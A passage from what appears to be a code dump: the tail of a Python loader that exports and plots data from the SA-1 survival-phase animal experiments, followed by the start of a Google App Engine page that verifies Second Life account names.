('LL/TBI,' * len(GetTime))).split(',')\n col1.pop(-1) # Drop the last entry in the list\n\n col2 = []\n for num in col2a:\n col2.append(str(num) + ' min')\n for num in col2b:\n col2.append(str(num) + ' h')\n for i, entry in enumerate(col1):\n worksheet.write(i + 2, col, entry)\n if i < len(col2):\n worksheet.write(i + 5, col + 1, col2[i])\n col += 2 # Move over 2 cols\n groupcounter = [] #Reset counter each time we go to a new field, it will be the same each time but why not?\n for i, group in enumerate(groups):\n #here we enter the data in for each group starting with the field, then the exp num, then the intervention, then the data.\n groupData = [Dataset[index] for index in groupIdx[group]]\n groupcounter.append(0)\n for exp in groupData:\n data = exp[field]\n\n worksheet.write(row+1, col, field, FieldFormat) #Write the field name we are intrested in.\n worksheet.write(row+2, col, exp['experimentNumber'], FieldFormat) # Write the experiment number for this col.\n worksheet.write(row+3, col, group, FieldFormat) # Write the treatment\n\n if isinstance(data, (type(pd.Series()), type(list()), type(np.array(1)))): #Need to discriminate between single valued fields and array based fields.\n try:\n for i, datum in enumerate(data):\n if not np.isnan(datum):\n worksheet.write(row+5+i, col, datum)\n except:\n print(\"an error from the first write statement happened\")\n elif isinstance(data, (type(datetime.datetime.now()), type(str()), type(int()), type(float()), type(datetime.time()))): #Many types are loaded from excel data.\n try:\n worksheet.write(row + 4, col, data)\n except:\n print(\"an error from the Second write statement happened\")\n else:\n if type(data) not in TypeList:\n TypeList.append(type(data))\n\n col += 1 #move over 1 col every exp.\n groupcounter[-1] += 1 #count the number of experiments in each group\n\n #Between each group we need 5 rows to calc the sumamary statstics. First figure out the excel addresses for the start:stop points.\n #write the headers for the rows #Dr.G wants the summary statistics at the end of all four groups. Each of the groups can have a different 5 colunm summary stats.\n for ix, group in enumerate(groups):\n\n worksheet.write_string(row+1, col, group, FormulaFormat)\n worksheet.write_string(row+1, col+1, group, FormulaFormat)\n worksheet.write_string(row+1, col + 2, group, FormulaFormat)\n worksheet.write_string(row+1, col + 3, group, FormulaFormat)\n worksheet.write_string(row+1, col + 4, group, FormulaFormat)\n\n worksheet.write_string(row+2, col, \"Mean\", FormulaFormat)\n worksheet.write_string(row+2, col+1, \"SEM\", FormulaFormat)\n worksheet.write_string(row+2, col + 2, \"n\", FormulaFormat)\n worksheet.write_string(row+2, col + 3, \"Min\", FormulaFormat)\n worksheet.write_string(row+2, col + 4, \"Max\", FormulaFormat)\n\n #Put in the group name for each of the stats cols. Merge these cells later\n worksheet.write_string(row + 3, col, group, FormulaFormat)\n worksheet.write_string(row + 3, col + 1, group, FormulaFormat)\n worksheet.write_string(row + 3, col + 2, group, FormulaFormat)\n worksheet.write_string(row + 3, col + 3, group, FormulaFormat)\n worksheet.write_string(row + 3, col + 4, group, FormulaFormat)\n\n for statrow in range(row+4, len(GetTime)+6):\n\n ncol = str(xlwrite.utility.xl_col_to_name(col + 2)) + str(statrow)\n slide = 5 * ix #Slide over enough to not count the previous summary columns.\n startcol = str(xlwrite.utility.xl_col_to_name(col - slide - (sum(groupcounter[ix:len(groups)])) )) + str(statrow)\n stopcol = str(xlwrite.utility.xl_col_to_name(col - 1 - slide - (sum(groupcounter[ix+1:len(groups)])) )) + str(statrow)\n\n # ncol = str(xlwrite.utility.xl_col_to_name(col+2)) + str(statrow)\n # startcol = str(xlwrite.utility.xl_col_to_name(col-(len(groupData)*len(groups)))) + str(statrow)\n # stopcol = str(xlwrite.utility.xl_col_to_name(col-1)) + str(statrow)\n\n\n\n worksheet.write_formula(statrow-1, col, '=IF('+ ncol+'=0,\"\",AVERAGE('+ startcol + ':' + stopcol + '))', FormulaFormat)\n worksheet.write_formula(statrow-1, col+1, '=IF(' + ncol + '=0,\"\",STDEV(' + startcol + ':' + stopcol + ')/SQRT(' + ncol + '))', FormulaFormat)\n worksheet.write_formula(statrow-1, col+2, '=COUNT('+ startcol + ':' + stopcol + ')', FormulaFormat) #NCol\n worksheet.write_formula(statrow-1, col+3, '=IF(' + ncol + '=0,\"\",MIN(' + startcol + ':' + stopcol + '))', FormulaFormat)\n worksheet.write_formula(statrow-1, col+4, '=IF(' + ncol + '=0,\"\",MAX(' + startcol + ':' + stopcol + '))', FormulaFormat)\n\n #Dr.G wants a max of max and min of min col to help look for outliers.\n startrow = str(xlwrite.utility.xl_col_to_name(col + 0) + str(4))\n stoprow = str(xlwrite.utility.xl_col_to_name(col + 0) + str(len(GetTime)+4))\n worksheet.write_formula(len(GetTime)+6, col + 0,\n 'AVERAGE(' + startrow + ':' + stoprow + ')', FormulaFormat)\n startrow = str(xlwrite.utility.xl_col_to_name(col + 3) + str(4))\n stoprow = str(xlwrite.utility.xl_col_to_name(col + 3) + str(len(GetTime)+4))\n worksheet.write_formula(len(GetTime)+6, col + 3,\n 'MIN(' + startrow + ':' + stoprow + ')', FormulaFormat)\n startrow = str(xlwrite.utility.xl_col_to_name(col + 4) + str(4))\n stoprow = str(xlwrite.utility.xl_col_to_name(col + 4) + str(len(GetTime ) + 4))\n worksheet.write_formula(len(GetTime)+6, col + 4,\n 'MAX(' + startrow + ':' + stoprow + ')', FormulaFormat)\n col += 5 # move over 5 col after every group/treatment. Start the next field output.\n\n #xlsxwriter.utility.xl_col_to_name(index) #use to figure out cols from numbers.\n\n print(TypeList) #Some of the time obj are being rejected. find out why.\n workbook.close()\n\n\n\ndef MSCPlots(Dataset, makePlots = None):\n #This is where i'll keep code to reproduce plots I like. TODO Move all plotting code elsewhere when we functionalize this loader.\n outpath = r'C:\\Users\\mattm\\PycharmProjects\\GazmuriDataLoader\\Figures\\\\'\n plotNum = 2 #How many plots are in the chart Add to this num if you want them to process automatically.\n if makePlots == None:\n makePlots = list(np.arange(1, plotNum+1))\n\n\n # These are the \"Tableau 20\" colors as RGB. Default colors suck\n tableau20 = [(31, 119, 180), (174, 199, 232), (255, 127, 14), (255, 187, 120),\n (44, 160, 44), (152, 223, 138), (214, 39, 40), (255, 152, 150),\n (148, 103, 189), (197, 176, 213), (140, 86, 75), (196, 156, 148),\n (227, 119, 194), (247, 182, 210), (127, 127, 127), (199, 199, 199),\n (188, 189, 34), (219, 219, 141), (23, 190, 207), (158, 218, 229)]\n # Scale the RGB values to the [0, 1] range, which is the format matplotlib accepts.\n for i in range(len(tableau20)):\n r, g, b = tableau20[i]\n tableau20[i] = (r / 255., g / 255., b / 255.)\n\n for num in makePlots:\n if num == 1:\n #Plot the prep time vs block.\n Data = selectData(Dataset, Key='Preparation time', groupBy='Block')\n plt.rc('font', family='serif')\n fig, ax = BoxPlot(Data)\n fig.suptitle(\"Preparation Time by Block\")\n ax.set_ylabel(\"Time (min)\")\n\n ax.set_xlabel(\"Block number\")\n\n ax.clip_on = False\n ax.spines['left'].set_position(('outward', 25))\n # ax.spines['bottom'].set_position(('outward', 25))\n # ax.spines['left'].set_smart_bounds(True)\n\n #standard stuff, should probably make a function to do this.\n fig.figsize =(12, 14)\n ax.spines[\"top\"].set_visible(False)\n # ax.spines[\"bottom\"].set_visible(False)\n ax.spines[\"right\"].set_visible(False)\n # ax.spines[\"left\"].set_visible(False)\n # Ensure that the axis ticks only show up on the bottom and left of the plot.\n # Ticks on the right and top of the plot are generally unnecessary chart junk.\n ax.get_xaxis().tick_bottom()\n ax.get_yaxis().tick_left()\n\n # Make sure your axis ticks are large enough to be easily read.\n # You don't want your viewers squinting to read your plot.\n axLim = ax.get_ybound()\n\n ticks = 50\n plt.yticks(range(0, int(np.around(axLim[1]*1.2, decimals=-1)), ticks), [str(x) for x in range(0, int(np.around(axLim[1]*1.2,decimals=-1)), ticks)], fontsize=10)\n plt.xticks(fontsize=12)\n ax.set_ylim(bottom=0, top=np.around(axLim[1]*1.2, decimals=-1)) #This is gonna change plot to plot.\n plt.rc('text', usetex=True)\n fig.savefig(outpath + 'Preparation Time.png', dpi=600, transparent=False, bbox_inches='tight')\n\n if num == 2:\n #Plot the prep time vs block.\n Data = selectData(Dataset, Key='Dura Rip Frequency', groupBy='Block')\n plt.rc('font', family='serif')\n fig, ax = BoxPlot(Data)\n fig.suptitle(\"Preparation Time by Block\")\n ax.set_ylabel(\"Dura Rip frequency\")\n\n ax.set_xlabel(\"Block number\")\n\n ax.clip_on = False\n ax.spines['left'].set_position(('outward', 25))\n # ax.spines['bottom'].set_position(('outward', 25))\n # ax.spines['left'].set_smart_bounds(True)\n\n #standard stuff, should probably make a function to do this.\n fig.figsize =(12, 14)\n ax.spines[\"top\"].set_visible(False)\n # ax.spines[\"bottom\"].set_visible(False)\n ax.spines[\"right\"].set_visible(False)\n # ax.spines[\"left\"].set_visible(False)\n # Ensure that the axis ticks only show up on the bottom and left of the plot.\n # Ticks on the right and top of the plot are generally unnecessary chart junk.\n ax.get_xaxis().tick_bottom()\n ax.get_yaxis().tick_left()\n\n # Make sure your axis ticks are large enough to be easily read.\n # You don't want your viewers squinting to read your plot.\n axLim = ax.get_ybound()\n\n ticks = 50\n plt.yticks(range(0, int(np.around(axLim[1]*1.2, decimals=-1)), ticks), [str(x) for x in range(0, int(np.around(axLim[1]*1.2,decimals=-1)), ticks)], fontsize=10)\n plt.xticks(fontsize=12)\n ax.set_ylim(bottom=0, top=np.around(axLim[1]*1.2, decimals=-1)) #This is gonna change plot to plot.\n plt.rc('text', usetex=True)\n fig.savefig(outpath + 'Preparation Time.png', dpi=600, transparent=False, bbox_inches='tight')\n\n if num == 2:\n # more plots\n pass\n\n\n\ndef generalizedExcelLoader(path, dataset = None, Integrate_on = (\"Experiment Number\", 'experimentNumber') , AddFields = ['field1'] ):\n #This function simply takes an excel sheet and reads it in. (defaulting to the first sheet)\n #Then we extract the data into a dataframe and iterate through it, adding a new field to the dataset if there is a match between the experiment and integrate on.\n #Integrate on is the holder for the field names we want to match between dataframes, it's a tuple with 2 values,\n # the first is what the search field is called in the dataset, the second is the colunm from the data you want to match with\n # TODO One issue is we are only able to match on experiment number here, but I don't expect to need to insert data on any other catagory\n\n ExcelMatchField = Integrate_on[0]\n DatasetMatchField = Integrate_on[1]\n\n if dataset != None:\n xls = pd.ExcelFile(DeathsClass)\n df = pd.read_excel(xls)\n\n for i, num in enumerate(df[ExcelMatchField]):\n if not np.isnan(num):\n match = []\n for j, exp in enumerate(dataset):\n if int(exp[DatasetMatchField]) == int(num):\n match.append(j) #Store the index in the dataset list.\n\n if len(match) == 1:\n # print(\"found match\")\n #Now that we have a match, we can add the fields to the dict for the exp.\n for field in AddFields:\n #TODO Make this more general by letting the user spesfic if we are bool or continous, but if data is nan, we can just leave that.\n if not pd.isnull(df[field].iloc[i]):\n dataset[match[0]][field] = 'Y'\n else:\n dataset[match[0]][field] = np.nan\n else:\n print('No match found, either 0 or 2+')\n\n else:\n print(\"No dataset input to pair with.\")\n return None #This should tell the user something is V wrong.\n return dataset\n\ndef DataFrameExport():\n #TODO Reform the data as a pandas dataframe. Small project.\n pass\n\ndef ArterialVenusAveraged(dataset=None, fields = ['R', 'K', 'Angle', 'MA', 'PMA', 'G', 'EPL', 'A', 'CI', 'LY30' ], VenOrPA = 'Ven', Technique = ''):\n #This function replicates the part of the excel sheet that Dr G put in to choose the blood gas and TEG data. Much of that data doesnt care if it's Ao or Venous so we average both together.\n #Just put the symbols that are outside of\n\n #Need to keep the technique that the measurement came from straight.\n if Technique != '':\n TechniqueSpace = ' ' + Technique\n else:\n TechniqueSpace = ''\n\n for exp in dataset:\n for field in fields:\n AoData = exp[field + ' ' + 'Ao' + TechniqueSpace ]\n VenData = exp[field + ' ' + VenOrPA + TechniqueSpace]\n Outlist = []\n for ix, Ao in AoData.iteritems():\n if np.isnan(AoData[ix]) and np.isnan(VenData[ix]):\n Outlist.append(np.nan)\n elif not np.isnan(AoData[ix]) and np.isnan(VenData[ix]):\n Outlist.append(AoData[ix])\n elif np.isnan(AoData[ix]) and not np.isnan(VenData[ix]):\n Outlist.append(VenData[ix])\n else:\n Outlist.append((AoData[ix] + VenData[ix])/2)\n exp[field + ' ' + 'Ao' + ' or ' + VenOrPA + TechniqueSpace ] = pd.Series(Outlist)\n\n return dataset\n\ndef StandardLoadingFunction(useCashe = False):\n\n # Timing function\n t1, timeTotal = time.time(), time.time()\n #Figure out if a cashe file exists.\n CasheFilename = 'Sa1Dataset.pickle'\n\n CasheExists = os.path.exists(os.path.join('cashe',CasheFilename))\n\n if not useCashe or not CasheExists:\n print('loading dataset fresh from on disk ')\n\n\n #Keep the standard loading code here so we can easily call it other places.\n experiment_lst = np.arange(2018104, 2018168 + 1) # Create a range of the experiment lists\n censor = np.isin(experiment_lst, [2018112, 2018120, 2018123, 2018153,\n 2018156]) # Create a boolean mask to exclude censored exps from the lst.\n\n censor = [not i for i in censor] # Invert the boolean mask\n experiment_lst = experiment_lst[censor] # Drop censored exp numbers\n experiment_lst = list(map(str, experiment_lst)) # Convert the list to strings\n\n # path = r\"C:\\Users\\mattm\\Documents\\Gazmuri analysis\\SA1 Analysis\\SA-1 Survival Phase (Master Workbook) April 12, 2019 (masked).xlsx\" #old data before groups became public.\n # path = r\"C:\\Users\\mattm\\Documents\\Gazmuri analysis\\SA1 Analysis\\SA-1 Survival Phase (Master Workbook) April 23, 2019 (Check Values Fixed).xlsx\"\n # path = r\"C:\\Users\\mattm\\Documents\\Gazmuri analysis\\SA1 Analysis\\SA-1 Survival Phase (Master Workbook) May 2, 2019 (Check Values Fixed).xlsx\"\n # path = r\"C:\\Users\\mattm\\Documents\\Gazmuri analysis\\SA1 Analysis\\SA-1 Survival Phase (Master Workbook) July 12 2019.xlsx\"\n # path = r\"C:\\Users\\mattm\\Documents\\Gazmuri analysis\\SA1 Analysis\\SA-1 Survival Phase (Master Workbook Final) July 15 2019.xlsx\"\n # path = r\"C:\\Users\\mattm\\Documents\\Gazmuri analysis\\SA1 Analysis\\SA-1 Survival Phase (Master Workbook FINAL) Aug 1 2019.xlsx\"\n # path = r\"C:\\Users\\mattm\\Documents\\Gazmuri analysis\\SA1 Analysis\\SA-1 Survival Phase (Master Workbook FINAL) Aug 6 2019 After ICPDescriptivesOut.xlsx\"\n path = r\"C:\\Users\\mattm\\Documents\\Gazmuri analysis\\SA1 Analysis\\SA-1 Survival Phase (Master Workbook FINAL) Sep 24 2019.xlsx\"\n print(' Loading from ' + path)\n\n # print(experiment_lst)\n\n\n Dataset = Parse_excel(path=path, Experiment_lst=experiment_lst)\n\n # Convert all datetimes to an int or string, because they are annoying.\n Dataset = DateTimesToStr(Dataset=Dataset)\n\n for exp in Dataset: #Just make a single field for BoodLossByKg\n if not np.isnan(exp['Estimated blood loss']):\n exp['BloodLossByKg'] = exp['Estimated blood loss']/exp['Weight']\n else:\n exp['BloodLossByKg'] = np.nan #BoodLossByKg\n\n # Calculate the pCO2 Ratio from the aortic to the venus.\n # Dataset = SA1DataManipulation.ProduceRatios(Dataset, fieldNum='pCO2 Ao (OPTI)', fieldDenom='pCO2 PA (OPTI)', ratio = True,\n # OutfieldName='PCO2 PV Ratio')\n\n print(\n 'Taking averages for the bloodwork data where Ao and Venus data exist, combining where they are exclusive.')\n # Default settings are for the TEG data, take either or.\n Dataset = ArterialVenusAveraged(Dataset)\n # Default settings are for the TEG data. #Had to change the strings to match the new (OPTI) field format.\n Dataset = ArterialVenusAveraged(Dataset, fields=['tHg', 'O2Hb', 'COHb', 'MetHb', 'O2Ct', 'O2Cap', 'sO2'],\n VenOrPA='PA', Technique='(AVOX)')\n Dataset = ArterialVenusAveraged(Dataset,\n fields=['pH', 'pCO2', 'pO2', 'BE', 'tCO2', 'HCO3', 'stHCO3', 'tHB', 'SO2',\n 'HCT',\n 'Lactate'], VenOrPA='PA', Technique='(OPTI)')\n Dataset = ArterialVenusAveraged(Dataset,\n fields=['pH', 'tCO2', 'HCO3', 'Na+', 'K+', 'Cl-', 'Ca++', 'AnGap', 'nCa++'],\n Technique='(OPTI ELYTE)')\n print(\"Bloodwork averages done at at {0} seconds\".format(time.time() - timeTotal))\n\n #Alternate calc for the pCO2 gradient across arterial and venus samples.\n Dataset = SA1DataManipulation.ProduceSums(Dataset, field1='pCO2 PA (OPTI)', field2='pCO2 Ao (OPTI)', add=False,\n OutfieldName='PCO2 PV difference')\n\n Dataset = SA1DataManipulation.ProduceSums(Dataset, field1='pCO2 Ao (OPTI)', field2='PetCO2 End Tidal Corrected', add=False,\n OutfieldName='pCO2 Art-ETCo2 difference')\n\n Dataset = SA1DataManipulation.ProduceRatios(Dataset, fieldNum= 'pCO2 Art-ETCo2 difference', fieldDenom='pCO2 Ao (OPTI)', ratio=True,\n OutfieldName='pCO2 A-ETCo2 %')\n for exp in Dataset:\n exp['pCO2 A-ETCo2 %'] = exp['pCO2 A-ETCo2 %'] * 100 #I'll MAKE A % OUT OF YOUUUUUUUUUU\n\n SingleIntrestParameters = [('Ao mean', 30), ('Ao mean', 60), ('Ao mean', 240), ('Lactate Ao (OPTI)', 240), ('PetCO2 End Tidal Corrected', 30),\n ('PetCO2 End Tidal Corrected', 30), ('VO2/ DO2', 30), ('VO2/ DO2', 240),\n ('LV end-diastolic', 30), ('LV end-diastolic', 240)] #List of tuples of the form (field, timepoint to loop through for the timepoints of intrest.)\n for Parameter in SingleIntrestParameters:\n #Extract single timepoints of intrest for COX hazard analysis.\n Dataset = SA1DataManipulation.SingleTimePointExtraction(Dataset=Dataset, field=Parameter[0], TimePoint=Parameter[1])\n\n # List of tuples of the form (field, Max or min) to loop through for the max or min values, False gives you the minimum\n MaxMinParameters = [('Ao mean', False), ('PetCO2 End Tidal Corrected', False), ('Heart rate LV', True), ('VO2/ DO2', True),\n ('LV end-diastolic', True), ('CCI', False), ('SVRI', True), ('Lactate Ao or PA (OPTI)', True),\n ('LV dP/dt min', True)]\n for Parameter in MaxMinParameters:\n #Find the mins of the following parameters per animal for the cox proportional hazard model.\n Dataset = SA1DataManipulation.ProduceMinMaxValues(Dataset=Dataset, field=Parameter[0], FindMax=Parameter[1])\n\n\n print(\"Total Dataset Loaded and processed at {0} seconds\".format(time.time() - timeTotal))\n\n\n\n\n # Save the dataset to the cashe. (Maybe date the cashes, or that might lead to file inflation.\n print('Cashing dataset to disk.')\n with open(os.path.join('cashe', CasheFilename), 'wb') as f:\n pickle.dump(Dataset, f)\n print('Cashe dumped to disk at {0} '.format(time.time() - timeTotal))\n\n elif not CasheExists:\n os.mkdir(os.path.join('cashe'))\n print('Call loader recursively to refresh Cashe.')\n StandardLoadingFunction(useCashe=False)\n\n else:\n #Load the dataset from disk.\n with open(os.path.join('cashe',CasheFilename), 'rb') as f:\n Dataset = pickle.load(f)\n print('Cashe loaded from disk in {0} '.format(time.time() - timeTotal))\n\n return Dataset\n\nif __name__ == \"__main__\":\n\n #Run the anaylsis starting from the master Excel sheets.\n Dataset = StandardLoadingFunction(useCashe=False)\n\n #Run the standard loader using the cashe, good for testing new functions that don't depend on changes in input data.\n # Dataset = StandardLoadingFunction(useCashe=True)\n\n\n\n Ao = selectData(Dataset)\n\n\n # # for group in Ao.keys():\n # frameLst.append(pd.DataFrame(data= np.transpose(Ao[group]), index=Time))\n # dfTot = pd.join(frameLst, keys= Ao.keys())\n\n\n # Run for KM analysis\n # survivalPlot(Dataset)\n\n #This was for before we had the data divided into groups\n #Dataset = Randomize_groups(Dataset)\n\n # integrate the deaths classifier\n DeathsClass = r\"C:\\Users\\mattm\\Documents\\Gazmuri analysis\\SA1 Analysis\\Experimental Deaths Classification July 12.xlsx\"\n\n\n Dataset = generalizedExcelLoader(dataset=Dataset, path=DeathsClass, AddFields=['Hemodynamic', 'Neurologic'])\n\n #Add the ratio of blood withdrawn by wieght in KG and after the 30 min mark, use the estimated blood withdrawn.\n Dataset = SA1DataManipulation.BloodWithdrawnPerKg(Dataset)\n\n\n\n #Run when you want to reproduce figures. I have a whole function set up to store those!\n # MSCPlots(Dataset)\n #Run to produce an xlsx file for spss to import.\n SPSSExport(Dataset)\n #Run to produce an xlsx file for Sigma plot.\n SigmaPlotExport(Dataset)\n #Produce the descriptives sheet for easy identification of outlier values.\n DescriptivesExport(Dataset)\n\n #Make a sound when program finsishes so I know it's done!\n duration = 500 # milliseconds\n freq = 450 # Hz\n winsound.Beep(freq, duration)\n print(\"Program finished succesfully, that IS what you wanted right?\")\n\n\n\"\"\"\"\nDate\nSeries\nBlock\nIntervention\nSplenic flow\nexperimentNumber\nTime\nHESDelivered\nPCO2 PV difference\npCO2 Art-ETCo2 difference\npCO2 A-ETCo2 %\nAo mean Time 30\nAo mean Time 60\nAo mean Time 240\nLactate Ao (OPTI) Time 240\nPetCO2 End Tidal Corrected Time 30\nSVRI\nPVRI\nDO2I\nVO2I\nVO2/ DO2\nVO2/ DO2 Time 30\nVO2/ DO2 Time 240\nLV end-diastolic Time 30\nLV end-diastolic Time 240\nAo mean Min\nPetCO2 End Tidal Corrected Min\nHeart rate LV Max\nVO2/ DO2 Max\nLV end-diastolic Max\nSVRI Max\nLactate Ao or PA (OPTI) Max\nWeight\nTime ketamine injection\nTime LL/TBI\nPreparation time\nSurvival time\nSurvival 240 minutes\nSurvival 72 hours\nLiver Lacerations\nEstimated blood loss\nImpactor depth\nImpactor speed\nImpactor dwell time\nHES Infused\nHES\nDural tear\nLeft hemisphere volume\nLeft hemisphere injury\nRight hemisphere volume\nRight hemisphere injury\nEKG Heart Rate\nAo systolic\nAo diastolic\nRA systolic\nRA diastolic\nPA systolic\nPA diastolic\nLV systolic\nLV end-diastolic\nHeart rate LV\nLV dP/dt max\nLV dP/dt min\nICP\nCCO\nPetCO2\nPiCO2\nRespiratory Rate\nTemperature PA\nBlood Removed\nTemperature X\nR Ao\nK Ao\nAngle Ao\nMA Ao\nPMA Ao\nG Ao\nEPL Ao\nA Ao\nCI Ao\nLY30 Ao\nR Ven\nK Ven\nAngle Ven\nMA Ven\nPMA Ven\nG Ven\nEPL Ven\nA Ven\nCI Ven\nLY30 Ven\ntHg Ao (AVOX)\nO2Hb Ao (AVOX)\nCOHb Ao (AVOX)\nMetHb Ao (AVOX)\nO2Ct Ao (AVOX)\nO2Cap Ao (AVOX)\nsO2 Ao (AVOX)\npH Ao (OPTI)\npCO2 Ao (OPTI)\npO2 Ao (OPTI)\nBE Ao (OPTI)\ntCO2 Ao (OPTI)\nHCO3 Ao (OPTI)\nstHCO3 Ao (OPTI)\ntHB Ao (OPTI)\nSO2 Ao (OPTI)\nHCT Ao (OPTI)\nLactate Ao (OPTI)\ntHg PA (AVOX)\nO2Hb PA (AVOX)\nCOHb PA (AVOX)\nMetHb PA (AVOX)\nO2Ct PA (AVOX)\nO2Cap PA (AVOX)\nsO2 PA (AVOX)\npH PA (OPTI)\npCO2 PA (OPTI)\npO2 PA (OPTI)\nBE PA (OPTI)\ntCO2 PA (OPTI)\nHCO3 PA (OPTI)\nstHCO3 PA (OPTI)\ntHB PA (OPTI)\nSO2 PA (OPTI)\nHCT PA (OPTI)\nLactate PA (OPTI)\npH Ao (OPTI ELYTE)\ntCO2 Ao (OPTI ELYTE)\nHCO3 Ao (OPTI ELYTE)\nNa+ Ao (OPTI ELYTE)\nK+ Ao (OPTI ELYTE)\nCl- Ao (OPTI ELYTE)\nCa++ Ao (OPTI ELYTE)\nAnGap Ao (OPTI ELYTE)\nnCa++ Ao (OPTI ELYTE)\npH Ven (OPTI ELYTE)\ntCO2 Ven (OPTI ELYTE)\nHCO3 Ven (OPTI ELYTE)\nNa+ Ven (OPTI ELYTE)\nK+ Ven (OPTI ELYTE)\nCl- Ven (OPTI ELYTE)\nCa++ Ven (OPTI ELYTE)\nAnGap Ven (OPTI ELYTE)\nnCa++ Ven (OPTI ELYTE)\nBSA\nHufner's Number\nAo mean\nRA mean\nPA mean\nCerebral PP Sys-ICP\nCerebral PP MAP-ICP\nPetCO2 End Tidal Corrected\nCaO2\nCvO2\nCCI\nStroke Volume Index\nLeft Ventricular Stroke Work Index\nCardiac Stroke Work Index\nRight Ventricular Stroke Work Index\nSVRI\nPVRI\nDO2I\nVO2I\nVO2/ DO2\nNeurological deficit exam score part 1\nNeurological deficit exam score part 2\nNeurological deficit exam score total\nFood acquisition test time 1\nFood acquisition test error score 1\nFood acquisition test time 2\nFood acquisition test error score 2\nFood acquisition test time 3\nFood acquisition test error score 3\nFood acquisition test time 4\nFood acquisition test error score 4\nFood acquisition test time 5\nFood acquisition test error score 5\nNovel object discrimination index\n\nBoodLossByKg\nR Ao or Ven\nK Ao or Ven\nAngle Ao or Ven\nMA Ao or Ven\nPMA Ao or Ven\nG Ao or Ven\nEPL Ao or Ven\nA Ao or Ven\nCI Ao or Ven\nLY30 Ao or Ven\ntHg Ao or PA (AVOX)\nO2Hb Ao or PA (AVOX)\nCOHb Ao or PA (AVOX)\nMetHb Ao or PA (AVOX)\nO2Ct Ao or PA (AVOX)\nO2Cap Ao or PA (AVOX)\nsO2 Ao or PA (AVOX)\npH Ao or PA (OPTI)\npCO2 Ao or PA (OPTI)\npO2 Ao or PA (OPTI)\nBE Ao or PA (OPTI)\ntCO2 Ao or PA (OPTI)\nHCO3 Ao or PA (OPTI)\nstHCO3 Ao or PA (OPTI)\ntHB Ao or PA (OPTI)\nSO2 Ao or PA (OPTI)\nHCT Ao or PA (OPTI)\nLactate Ao or PA (OPTI)\npH Ao or Ven (OPTI ELYTE)\ntCO2 Ao or Ven (OPTI ELYTE)\nHCO3 Ao or Ven (OPTI ELYTE)\nNa+ Ao or Ven (OPTI ELYTE)\nK+ Ao or Ven (OPTI ELYTE)\nCl- Ao or Ven (OPTI ELYTE)\nCa++ Ao or Ven (OPTI ELYTE)\nAnGap Ao or Ven (OPTI ELYTE)\nnCa++ Ao or Ven (OPTI ELYTE)\n\n\"\"\"","repo_name":"mattmaggio19/GazmuriPython","sub_path":"SA1DataLoader.py","file_name":"SA1DataLoader.py","file_ext":"py","file_size_in_byte":53755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"34881713609","text":"# Code was released into the public domain by Darien Caldwell\r\n# http://forums.secondlife.com/showthread.php?t=323981\r\n\r\nimport cgi\r\nimport urllib\r\nimport logging\r\nimport lindenip\r\nimport os\r\nimport relations\r\nimport time\r\nimport datetime\r\nimport string\r\nfrom model import GoogleSLIds\r\nfrom random import choice\r\nfrom google.appengine.api import users\r\nfrom google.appengine.ext import webapp\r\nfrom google.appengine.ext.webapp.util import run_wsgi_app\r\nfrom google.appengine.ext import db\r\n\r\n\r\n\r\nhead = '''\r\n\r\n\r\nwebinterface\r\n\r\n\r\n\r\n'''\r\nend = '''\r\n\r\n\r\n'''\r\nform = '''\r\n
\r\nVerify an account you own. Enter your user name:\r\n\r\n\r\n
\r\n'''\r\n\r\ndef GenVeriCode(length=4, chars=string.letters + string.digits):\r\n return ''.join([choice(chars) for i in range(length)])\r\n\r\nclass MainPage(webapp.RequestHandler):\r\n\r\n def get(self):\r\n user = users.get_current_user()\r\n userid = user.user_id()\r\n q1 = GoogleSLIds.all().filter(\"google_id =\", userid)\r\n q2 = GoogleSLIds.all().filter(\"google_id =\", userid)\r\n q3 = GoogleSLIds.all().filter(\"google_id =\", userid)\r\n if q1.count() == 0:\r\n message = '''\r\n You do not have any SL names linked to this acount. Enter a SL username to be verified. You will get an IM to complte the verifcation.\r\n
\r\n '''+form\r\n self.response.out.write(head+message+end)#promt to add name to list\r\n else:\r\n q1.filter(\"verifed =\", True)\r\n if not q1.count() == 0:\r\n message = \"Verifed names:
\"\r\n for x in q1:\r\n message += x.sl_name+\"
\"\r\n av = x.sl_key\r\n subdictown = {}\r\n subdictsecown = {}\r\n ownersubs = relations.getby_subj_type(av, 'owns')\r\n for sub in ownersubs:\r\n id = sub.obj_id\r\n if id not in subdictown:\r\n subdictown[id] = relations.key2name(id)\r\n else:\r\n #delete duplicates\r\n sub.delete()\r\n \r\n secownersubs = relations.getby_subj_type(av, 'secowns')\r\n for sub in secownersubs:\r\n id = sub.obj_id\r\n if id not in (subdictown or subdictsecown):#since you can be both an owner and a secowner, ignore those here already in the owner list\r\n subdictsecown[id] = relations.key2name(id)\r\n \r\n out = ''\r\n for sub in subdictown:\r\n out += '%s own
' % (sub, subdictown[sub])\r\n for sub in subdictsecown:\r\n out += '%s secown
' % (sub, subdictsecown[sub])\r\n message += out\r\n q2.filter(\"verifed =\", False)\r\n if not q2.count() == 0:\r\n message += \"You have the following names waiting to be verifed:
\"\r\n for x in q2:\r\n message += x.sl_name+\"
\"\r\n message += form\r\n #at least one acount verifed\r\n self.response.out.write(head+message+end)\r\n else:\r\n message = \"You have the following names waiting to be verifed:
\"\r\n results = q2.fetch(10) \r\n for x in results:\r\n message += x.sl_name+\"
\"\r\n message += form\r\n self.response.out.write(head+message+end)#show the acocounts not verifed and promt or more\r\n\r\n def post(self):\r\n user = users.get_current_user()\r\n a = GoogleSLIds().gql(\"WHERE google_id = :1 AND sl_name = :2\", user.user_id(), self.request.get(\"username\")).get()\r\n if (a is None):\r\n a = GoogleSLIds()\r\n if not (a.verifed):\r\n a.google_id = user.user_id()\r\n a.google_email = user.email()\r\n a.sl_name = self.request.get(\"username\")\r\n a.sl_key = relations.name2key(a.sl_name)\r\n a.datetime = datetime.datetime.utcnow()\r\n a.vericode = GenVeriCode()\r\n if not a.sl_key == None:\r\n #notify in world object\r\n a.sentim = False\r\n logging.info('%s asked to be linked to %s and was found in the database' % (a.google_email, a.sl_name))\r\n else:\r\n a.sentim = True #cannot send an IM so mark as sent.\r\n logging.info('%s asked to be linked to %s but was not found in the database.' % (a.google_email, a.sl_name))\r\n a.put()\r\n message = '''\r\nIf we have records of '''+a.sl_name+''' then a IM has been sent. \r\n
\r\nEnter a SL username to be verified. You will get an IM to complete the verification.\r\n
\r\n'''+form\r\n else:\r\n message = '''\r\nYou have already verified '''+a.sl_name+'''. \r\n
\r\nEnter a SL username to be verified. You will get an IM to complete the verification.\r\n
